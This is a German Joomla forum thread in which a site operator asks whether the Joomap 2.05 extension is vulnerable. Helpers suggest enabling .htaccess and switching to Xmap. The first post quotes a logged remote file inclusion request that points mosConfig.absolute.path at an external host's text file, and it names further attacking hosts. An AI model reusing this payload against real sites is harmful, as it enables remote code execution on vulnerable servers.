+ Antworten
Ergebnis 1 bis 4 von 4

Thema: Joomap 2.05 unsicher?

  1. 01.03.2010 10:15 #1
    jrsynoptio
    jrsynoptio ist offline
    Neu an Board
    Registriert seit
    01.03.2010
    Beiträge
    3
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Joomap 2.05 unsicher?

    Hallo,

    wir erhalten in letzter Zeit vermehrt Attacks über Indonesische und Koreanische Seiten mit folgendem Inhalt die uns PHPIDS meldet.

    GET.Itemid=111%2F%2Flibs%2FBlowfish%2FCBC.php%3Fmo sConfig.absolute.path%3Dhttp%3A%2F%2Fsmkn-13bdg.sch.id%2Fid1.txt%3F,
    Request URI: %2Findex.php%3Foption%3Dcom_joomap%26Itemid%3D111% 2F%2Flibs%2FBlowfish%2FCBC.php%3FmosConfig.absolut e.path%3Dhttp%3A%2F%2Fsmkn-13bdg.sch.id%2Fid1.txt%3F

    weitere Sites sind:
    greenisac.co.kr
    www.hubns.co.kr

    diese URL-Manipulation wird ja in eine 404 umgeleitet.
    nach prüfung der DB und der Sitefiles wurden keine veränderungen vorgenommen.
    Aber alle Attacken versuchen über die Joomap Komponente einzudringen.
    Gibt es aktuell eine Sicherheitslücke in dieser Komponente und hat jemand anderes ähnliche Angriffe (falls man diese so bezeichnen kann) verzeichnet???

    Vielen Dank im vorraus
    Zitieren Zitieren
  2. 01.03.2010 10:31 #2
    keraM
    keraM ist offline
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.580
    Bedankte sich
    152
    Erhielt 2.555 Danksagungen
    in 2.357 Beiträgen

    Standard

    Ob joomap aktuelle eine bekannte Sicherheitslücke hat, kann ich nicht sagen.

    Du könntest aber mal die joomlaeigene .htaccess aktivieren. Dort werden solche Geschichten mit mosConfig schon abgewiesen.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!
    Zitieren Zitieren

  3. Erhielt Danksagungen von:

    jrsynoptio
  4. 02.03.2010 08:42 #3
    jrsynoptio
    jrsynoptio ist offline
    Neu an Board
    Registriert seit
    01.03.2010
    Beiträge
    3
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Vielen Dank,

    natürlich ist die .htaccess aktiviert und sollte ein URL-Aufruf mit mosConfig etc. starten wird dieser natürlich abgefangen.
    Bin zwar relativerNeuling auf dem Gebiet aber hätte ja sein können das es bekannte Lücken gibt die Schadcode etc. einschleusen.

    Gruß
    Zitieren Zitieren
  5. 02.03.2010 08:50 #4
    Arni
    Arni ist offline
    Wohnt hier Avatar von Arni
    Registriert seit
    10.01.2005
    Beiträge
    4.679
    Bedankte sich
    186
    Erhielt 1.157 Danksagungen
    in 1.094 Beiträgen

    Standard

    Ist die 2.05 nicht für J!1.0x? Habe bei http://koder.de/projekte/joomap/ für J!1.5x hab ich nur eine 2.06b2 gefunden. Vielleicht solltest du eine andere Erweiterung nutzen, z.B. Xmap
    Angehängte Grafiken

    Gruss Ralf
    Thread gelöst? & FAQ
    www.smb-buettgen.de + www.schuetzenbruderschaft-buettgen.de
    Zitieren Zitieren

  6. Erhielt Danksagungen von:

    jrsynoptio
+ Antworten
« Vorheriges Thema | Nächstes Thema »

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

Foren-Regeln